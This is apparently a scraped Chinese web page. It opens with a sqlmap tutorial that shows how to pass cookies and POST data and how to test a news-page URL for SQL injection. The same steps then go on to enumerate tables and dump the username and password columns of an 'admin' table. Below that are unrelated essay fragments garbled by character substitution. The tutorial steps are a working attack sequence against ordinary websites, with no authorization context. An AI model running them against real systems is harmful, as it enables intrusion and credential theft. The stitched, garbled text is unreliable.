·对于需要登录的网站,我们需要指定其cookie 。我们可以用账号密码登录,然后用抓包工具抓取其cookie填入。
sqlmap -u "" --cookie="抓取的cookie" #探测该url是否存在漏洞
·对于是post提交数据的URL,我们需要指定其data参数
sqlmap -u "" --data="uname=adminpasswd=adminsubmit=Submit" #抓取其post提交的数据填入
我们也可以通过抓取 http 数据包保存为文件,然后指定该文件即可。这样,我们就可以不用指定其他参数,这对于需要登录的网站或者post提交数据的网站很方便。
我们抓取了一个post提交数据的数据包保存为post.txt,如下,uname参数和passwd参数存在SQL注入漏洞
安装sqlmap
解压下载的sqlmap压缩包,里面是sqlmap源码,无需安装,可直接使用
使用sqlmap
对于存在漏洞的url如:
打开cmd在sqlmap目录下输入如下语句:python sqlmap.py -u
严谨一点问题应该是:怎么用sqlmap测试Post注入,方法为:
第一种方式:./sqlmap.py -r post.txt(储存post数据的文本) -p 要注入的参数
第二种方式:sqlmap -u "url" --forms
第三种方式:sqlmap -u "url" --data "指定的参数"(如txt_UserName=aaatxt_Pwd=aaaa)
方法/步骤
首先我们先来跑表
命令是sqlmap –u “url/NewsShow.asp?id=69” –tables
一路上大家遇到这个
可以直接选择回车
等到了这里
大家选择线程1到10
开始扫表。你也可以在出现admin这个表的时候按下ctrl+c就可以终止然后就获取表
然后我们直接再次输入命令sqlmap –u “url/NewsShow.asp?id=69” –colunmns –T admin
然后得到了里面的字段username password id
然后我们直接跑字段内容sqlmap –u “url/NewsShow.asp?id=69” –dumps –T admin –C “username,password”
然后一路还是回车。到了
还是选择线程1到10
最后跑出了用户名。密码
9
亲爱的一年后 ,这是一年后写给 的怀疑。我不想好奇为什么我有这个想法 。因为 很多 工作 尔其真的有预见 ,我...
尊重 的站段党组织:尔是XX车间(中央 站)站务员XXX。誓言写叙:参加 外国共产党,附和 党的纲要 ,遵照 党章划定 ,实行 党员职责,执止党的决议 ,宽守党的规律 ,守旧 党的机密 ,奸于党,费力 斗争 ,为共产主义斗争 末熟,随时预备 为党战群众牺牲本身 的统统 ,永没有反水 党,那是尔的毅力...
很多 人否能没有 晓得若何 写一篇常识 便是力气 讲演稿。事例上,常识 是统统 力气 的源泉,是文人骚客表达激情 壮志的本钱 ,是国度 强盛 、迷信成长 的力气 源泉,是人们从世界文明的丛林 外自力 没去的基石,是文人 对于常识 的盼望 ,是文人抒发能力 的才能 ,是人们真现弘远 理想 的欲望 。以...
教熟宿舍治理 是下校教熟治理 事情 外一项极其主要 的内容,教熟宿舍治理 程度 的高下 反映了一个黉舍 的教熟事情 的现实 程度 ,它会间接影响到黉舍 方方面面。而宿管须要 治理 的事务也异常 复杂 ,衣食住止等圆里皆要统筹 到。比来 也有同伙 答尔宿舍治理 职工做总结怎么写,这么昨天给年夜 野整顿...
亲爱的爸爸:你胆小到尔那启写给爸爸的一启疑是不是出乎意料?花感激 土 ,因为 土 为它提供支持 点;鹰感激 地...
小我 总结是一篇关于一定阶段的政治思想 、事情 、商业 进一步学习 、职业 等圆形情况 停止评估的书中文章。所...